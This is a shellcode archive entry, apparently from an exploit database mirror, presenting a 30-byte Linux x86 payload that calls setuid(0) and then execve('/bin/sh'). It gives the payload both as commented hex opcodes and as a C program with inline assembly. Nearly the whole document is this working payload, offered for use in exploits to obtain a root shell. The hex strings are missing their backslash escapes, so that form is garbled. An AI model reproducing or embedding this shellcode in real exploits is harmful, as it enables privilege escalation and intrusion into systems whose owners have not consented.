linux/x86 execve /bin/sh 30 bytes

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : linux/x86 execve /bin/sh 30 bytes
# Published : 2004-09-12
# Author : Matias Sedalo
# Previous Title : linux/x86 execve /bin/sh 38 bytes
# Next Title : linux/x86 execve /bin/sh setreuid(12,12) 50 bytes

/*
s0t4ipv6@shellcode.com.ar
20 de marzo de 2001


"x31xdb"                      // xorl         %ebx,%ebx
"x8dx43x17"                  // leal         0x17(%ebx),%eax
"xcdx80"                      // int          $0x80
"x31xd2"                      // xorl         %edx,%edx
"x52"                          // pushl        %edx
"x68x6ex2fx73x68"          // pushl        $0x68732f6e
"x68x2fx2fx62x69"          // pushl        $0x69622f2f
"x89xe3"                      // movl         %esp,%ebx
"x52"                          // pushl        %edx
"x53"                          // pushl        %ebx
"x89xe1"                      // movl         %esp,%ecx
"xb0x0b"                      // movb         $0xb,%al
"xcdx80";                     // int          $0x80

*/

void main() {
__asm__ ("
	xorl	%ebx, %ebx
	leal	0x17(%ebx),%eax
	int	$0x80				# here was cleared eax

	xorl	%edx, %edx
	pushl	%edx
	pushl	$0x68732f6e
	pushl	$0x69622f2f
	movl	%esp, %ebx
	pushl	%edx
	pushl	%ebx
	movl	%esp, %ecx
	movb	$0xb, %al			# and makeuof here
	int	$0x80
	");
}

// www.Syue.com [2004-09-12]